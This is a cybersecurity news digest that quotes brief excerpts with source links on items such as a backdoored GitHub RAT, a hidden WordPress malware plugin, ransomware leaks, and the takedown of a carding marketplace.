"At Sophos X-Ops, we often get queries from our customers asking if they’re protected against certain malware variants. At first glance, a recent question seemed no different. A customer wanted to know if we had protections for ‘Sakura RAT,’ an open-source malware project hosted on GitHub, because of media claims that it had “sophisticated anti-detection capabilities.” When we looked into Sakura RAT, we quickly realized two things. First, the RAT itself was likely of little threat to our customer. Second, while the repository did indeed contain malicious code, that code was intended to target people who compiled the RAT, with infostealers and other RATs. In other words, Sakura RAT was backdoored."
https://news.sophos.com/en-us/2025/06/04/the-strange-tale-of-ischhfd83-when-cybercriminals-eat-their-own/
https://www.bleepingcomputer.com/news/security/hacker-targets-other-hackers-and-gamers-with-backdoored-github-code/
https://www.infosecurity-magazine.com/news/campaign-targets-cybercriminals/
- Malware Masquerades As Legitimate, Hidden WordPress Plugin With Remote Code Execution Capabilities
"The Wordfence Threat Intelligence team recently discovered an interesting malware variant that appears in the file system as a normal WordPress plugin containing a comment header, a handful of functions as well as a simple admin interface. Just like previous examples we have seen, this piece of malware contains code that ensures it remains hidden in the administrator dashboard. It has a password extraction feature, which requires configuration through its own admin interface, an AJAX-based remote code execution mechanism and unfinished code suggesting it is still in development."
https://www.wordfence.com/blog/2025/06/malware-masquerades-as-legitimate-hidden-wordpress-plugin-with-remote-code-execution-capabilities/
Breaches/Hacks/Leaks
- ‘Deliberate Attack’ Deletes Shopping App’s AWS And GitHub Resources
"The CEO of Indian grocery ordering app KiranaPro has claimed an attacker deleted its GitHub and AWS resources in a targeted and deliberate attack and vowed to name the perpetrator. KiranaPro lets users shop at “Kiranas,” the Indian equivalent of convenience stores, which mostly stock basic foodstuffs. Users of the app place an order, which KiranaPro sends to nearby Kiranas who bid to win the sale. The winner arranges delivery of the goods. The elapsed time from ordering to delivery seldom tops 20 minutes."
https://www.theregister.com/2025/06/04/kiranapro_cyberattack_deletes_cloud_resources/
- Media Giant Lee Enterprises Says Data Breach Affects 39,000 People
"Publishing giant Lee Enterprises is notifying nearly 40,000 people whose personal information was stolen in a February 2025 ransomware attack. As one of the largest newspaper groups in the United States, Lee Enterprises publishes 77 daily newspapers and 350 weekly and specialty publications across 26 states. The local news provider's newspapers have a daily circulation of over 1.2 million, and a digital audience reaching tens of millions each month. In a filing with the Office of Maine's Attorney General this week, the company revealed that attackers behind a ransomware attack in February stole documents containing personally identifiable information of 39,779 individuals."
https://www.bleepingcomputer.com/news/security/media-giant-lee-enterprises-says-data-breach-affects-39-000-people/
https://therecord.media/newspaper-lee-enterprises-cyberattack-ssn
https://www.theregister.com/2025/06/04/cyberattack_lee_enterprises/
- Ukraine Claims It Hacked Tupolev, Russia’s Strategic Warplane Maker
"The Main Intelligence Directorate (GUR) of Ukraine's Ministry of Defense claims it hacked the Russian aerospace and defense company Tupolev, which develops Russia's supersonic strategic bombers. According to Ukrainian news outlets, a source within GUR said the military intelligence hackers breached Tupolev's systems and stole 4.4 gigabytes of classified information. This stolen data includes personal data of Tupolev personnel, internal communications (including messages exchanged by the company's management), procurement documents, resumes of engineers and designers, and minutes of closed meetings."
https://www.bleepingcomputer.com/news/security/ukraine-claims-it-hacked-tupolev-russias-strategic-warplane-maker/
https://therecord.media/ukraine-military-russia-strategic-bomber
https://securityaffairs.com/178641/hacking/ukraines-military-intelligence-agency-stole-4-4gb-of-highly-classified-internal-data-from-tupolev.html
https://www.theregister.com/2025/06/04/ukraine_hack_attack_russia/
- Exclusive: Hackers Leak 86 Million AT&T Records With Decrypted SSNs
"Hackers have leaked what they claim is AT&T’s database which was reportedly stolen by the ShinyHunters group in April 2024 after they exploited major security flaws in the Snowflake cloud data platform. But is this really the Snowflake-linked data? We took a closer look. As seen by the Hackread.com research team, the data was first posted on a well-known Russian cybercrime forum on May 15, 2025. It was re-uploaded on the same forum on June 3, 2025, after which it began circulating among other hackers and forums."
https://hackread.com/hackers-leak-86m-att-records-with-decrypted-ssns/
- Ransomware Scum Leak Patient Data After Disrupting Chemo Treatments At Kettering
"Kettering Health patients who had chemotherapy sessions and pre-surgery appointments canceled due to a ransomware attack in May now have to deal with the painful prospect that their personal info may have been leaked online. Earlier today, ransomware gang Interlock dumped 941 GB of data purportedly belonging to the healthcare provider. The stolen information appears to include ID cards, payment data, purchasing and financial reports, among a ton of other patient and staff details, and encompasses 732,490 files across 20,418 folders, according to the leak site."
https://www.theregister.com/2025/06/04/ransomware_scum_leak_kettering_patient_data/
General News
- The Hidden Risks Of LLM Autonomy
"Large language models (LLMs) have come a long way from the once passive and simple chatbots that could respond to basic user prompts or look up the internet to generate content. Today, they can access databases and business applications, interact with external systems to independently execute complex tasks and make business decisions. This transformation is primarily supported by emerging interoperability standards, such as the Model Context Protocol (MCP) and Agent-to-Agent (A2A) communication."
https://www.helpnetsecurity.com/2025/06/04/llm-agency/
- Agentic AI And The Risks Of Unpredictable Autonomy
"In this Help Net Security interview, Thomas Squeo, CTO for the Americas at Thoughtworks, discusses why traditional security architectures often fail when applied to autonomous AI systems. He explains why conventional threat modeling needs to adapt to address autonomous decision-making and emergent behaviors. Squeo also outlines strategies for maintaining control and accountability when AI agents operate with increasing autonomy."
https://www.helpnetsecurity.com/2025/06/04/thomas-squeo-thoughtworks-ai-systems-threat-modeling/
- Rethinking Governance In a Decentralized Identity World
"Decentralized identity (DID) is gaining traction, and for CISOs, it’s becoming a part of long-term planning around data protection, privacy, and control. As more organizations experiment with verifiable credentials and self-sovereign identity models, a question emerges: Who governs the system when no single entity holds the reins?"
https://www.helpnetsecurity.com/2025/06/04/governance-decentralized-identity/
- Exposure Management: From Subjective To Objective Cybersecurity
"Exposure management gives business and cybersecurity leaders the methodology and tools to make informed cybersecurity risk management decisions. Significant barriers stand in the way of adoption."
https://www.ivanti.com/resources/research-reports/proactive-security
https://www.helpnetsecurity.com/2025/06/04/ciso-exposure-management/
- #Infosec2025: Majority Of Compromises Caused By Stolen Credentials, No MFA
"More than half (56%) of all compromises in Q1 2025 resulted from the theft of valid account credentials with no multi-factor authentication (MFA) in place, according to new research by Rapid7, published during Infosecurity Europe 2025. The researchers expect stolen credentials to continue to be the dominant initial access technique while organizations fail to protect all accounts with MFA. In the previous two quarters, a similar proportion of initial access vectors were related to credential theft and a lack of MFA."
https://www.infosecurity-magazine.com/news/majority-compromises-stolen/
- The Security Risks Of Internet-Exposed Solar Power Systems
"On May 14, Reuters reported rogue communication devices were found in Chinese-manufactured solar power inverters. That news prompted governments throughout the world to evaluate the potential impact of these inverters being remotely disabled. Also, last month, the Iberian peninsula experienced a massive power grid failure where societies in Madrid, Lisbon and all over the region were deeply affected by a blackout. Life came to a sudden halt. Airports shut down. Trains stopped in the middle of nowhere. Traffic lights were out. Digital payment systems to buy food and water were useless. It was a chaotic and stressful time."
https://www.forescout.com/blog/the-security-risks-of-internet-exposed-solar-power-systems/
https://www.securityweek.com/35000-solar-power-systems-exposed-to-internet/
https://www.darkreading.com/vulnerabilities-threats/35k-solar-devices-internet-exposure-hijacking
- Hacker Arrested For Breaching 5,000 Hosting Accounts To Mine Crypto
"The Ukrainian police arrested a 35-year-old hacker who breached 5,000 accounts at an international hosting company and used them to mine cryptocurrency, resulting in $4.5 million in damages. "The suspect illegally gained access to over 5,000 accounts belonging to clients of an international hosting company that provides server rental services for the operation of various websites and online platforms," reads the police's announcement. "After gaining access to these accounts, the perpetrator began unauthorized deployment of virtual machines (software that emulates a computer's operation) using the company's server resources.""
https://www.bleepingcomputer.com/news/security/hacker-arrested-for-breaching-5-000-hosting-accounts-to-mine-crypto/
- U.S. Government Seizes Approximately 145 Criminal Marketplace Domains
"The U.S. Attorney’s Office for the Eastern District of Virginia announced today the seizure of approximately 145 darknet and traditional internet domains, and cryptocurrency funds associated with the BidenCash marketplace. The operators of the BidenCash marketplace use the platform to simplify the process of buying and selling stolen credit cards and associated personal information. BidenCash commenced operations in March 2022. BidenCash administrators charged a fee for every transaction conducted on the website. The BidenCash marketplace had grown to support over 117,000 customers, facilitated the trafficking of over 15 million payment card numbers and personally identifiable information, and generated over $17 million in revenue during its operations."
https://www.justice.gov/usao-edva/pr/us-government-seizes-approximately-145-criminal-marketplace-domains
https://www.bleepingcomputer.com/news/security/bidencash-carding-market-domains-seized-in-international-operation/
https://therecord.media/bidencash-cybercrime-darknet-market-takedown-us-netherlands
https://www.bankinfosecurity.com/police-seize-carder-site-bidencash-a-28586
https://cyberscoop.com/bidencash-marketplace-domains-seized/
https://hackread.com/feds-seize-bidencash-carding-market-crypto-profits/
-
How Neuroscience Can Help Us Battle 'Alert Fatigue'
"I often say that cybersecurity professionals today are not drowning, they're suffocating. Research I recently undertook with colleagues at OX Security revealed that an average organization has more than half a million alerts at any given moment. More staggering is the fact that somewhere between 95% and 98% of those alerts are not critical, and many times not even issues that need to be dealt with at all. This deluge has created the alert fatigue crisis, which threatens the foundations of our digital defense and is actually deeply rooted in neuroscience."
https://www.darkreading.com/vulnerabilities-threats/how-neuroscience-battle-alert-fatigue
-
Researchers Bypass Deepfake Detection With Replay Attacks
"As synthetic audio continues to improve, it's also getting harder for anti-spoofing models to accurately detect. That's according to recent research published on June 1 by a team of researchers at German, Polish, and Romanian universities as well as Resemble AI, a vendor that provides AI voice generation tools as well as deepfake detectors. The research team presented how "replay attacks" are able to bypass audio deepfake detections. "By playing and re-recording deepfake audio through various speakers and microphones, we make spoofed samples appear authentic to the detection model," they wrote."
https://www.darkreading.com/cybersecurity-analytics/researchers-bypass-deepfake-detection-replay-attacks
https://arxiv.org/pdf/2505.14862
-
Beware Of Device Code Phishing
"Device codes are alphanumeric or numeric codes employed for authenticating an account on a device that does not have a standard login interface, such as a browser or input-limited devices, where it is not practical to require the user to enter text to authenticate. Such use cases include Internet of Things (IoT) devices, streaming apps like Netflix and Apple TV, and cloud applications. Device code authentication specifically binds authentication to a particular device."
https://www.darkreading.com/vulnerabilities-threats/beware-device-code-phishing
-
How To Approach Security In The Era Of AI Agents
"Artificial intelligence (AI) agents represent an exciting technological evolution, capable of autonomously completing tasks, analyzing outcomes, and adapting their actions based on human-set goals. This next phase of hyperautomation has the potential to unlock unprecedented levels of efficiency and productivity for workers and enterprises — providing that the security team is engaged early and the proper controls are put in place from the start."
https://www.darkreading.com/cyber-risk/how-to-approach-security-era-ai-agents
-
The State Of DDoS Attacks In APAC In Q1 2025
"Our analysts continue to monitor the DDoS situation across Asia and share key trends in our regular reports. This is our Q1 2025 overview, where we highlight the most targeted industries, emerging techniques used by cybercriminals, and top insights based on data from our global scrubbing centers."
https://stormwall.network/resources/blog/ddos-report-apac-q1-2025
https://hackread.com/stormwall-india-china-us-most-ddos-attacks-q1-2025/
-
#Infosec2025: Cybersecurity Support Networks Too Fragmented For SMBs, Say Experts
"Sources of cybersecurity advice and support are too diffuse and difficult to find, adding complexity to SMB efforts to build cyber-resilience, a panel of experts has argued. Speaking on the second day of Infosecurity Europe, experts from across industry, academia and government agreed that awareness isn’t necessarily the problem among smaller businesses. In fact, cybersecurity is now the second biggest concern for British SMBs, just after inflation, according to the recently released VikingCloud 2025 SMB Threat Landscape Report."
https://www.infosecurity-magazine.com/news/infosec2025-cybersecurity-support/
-
#Infosec2025: Device Theft Causes More Data Loss Than Ransomware
"Phishing-related data breaches are the leading causes of data loss, followed by misconfigurations and stolen devices, according to a new survey from data erasure solution provider Blancco. The firm commissioned research agency Coleman Parkes to survey 2000 cybersecurity, IT and sustainability leaders from large enterprises across several countries and industries about their data security and data resilience practices. The results, published on June 4 in Blancco’s 2025 State of Data Sanitization Report, showed that 86% of organizations have experienced a data breach over the past three years."
https://www.infosecurity-magazine.com/news/device-theft-data-loss-ransomware/
-
Going Into The Deep End: Social Engineering And The AI Flood
"It should come as no surprise that the vast majority of data breaches involve the “human element.” The 2025 Verizon Data Breach Investigations Report cites that human compromise held relatively steady year over year at nearly 70% of breaches. Human emotions and tendencies – and the massive variation in what influences each individual – are a massively dynamic vulnerability. Most equate Social Engineering with vague promises of riches to be had, or urgent or even threatening missives that require immediate action to avoid consequences. On the plus side, increased awareness has brought about a healthy skepticism in individuals and organizations toward something unexpected from a not completely familiar source."
https://www.securityweek.com/going-into-the-deep-end-social-engineering-and-the-ai-flood/
-
More Than 1,800 People Arrested In Transnational Anti-Scam Operation Involving SPF; 106 Nabbed In Singapore
"Over 1,800 people were arrested during a month-long anti-scam operation by law enforcement authorities from seven Asian jurisdictions. Victims of the scam cases reportedly lost over S$289 million (US$225 million), the Singapore Police Force (SPF) said in a news release on Wednesday (Jun 4). Law enforcement agencies from Singapore, Hong Kong, South Korea, Malaysia, Maldives, Thailand and Macau conducted the operation between Apr 28 and May 28."
https://www.channelnewsasia.com/singapore/scams-1800-arrested-investigated-police-rental-impersonation-bank-transfer-5165696
References
Electronic Transactions Development Agency (ETDA)
-
The Future Of Cybersecurity Standards For Global Federal Energy Systems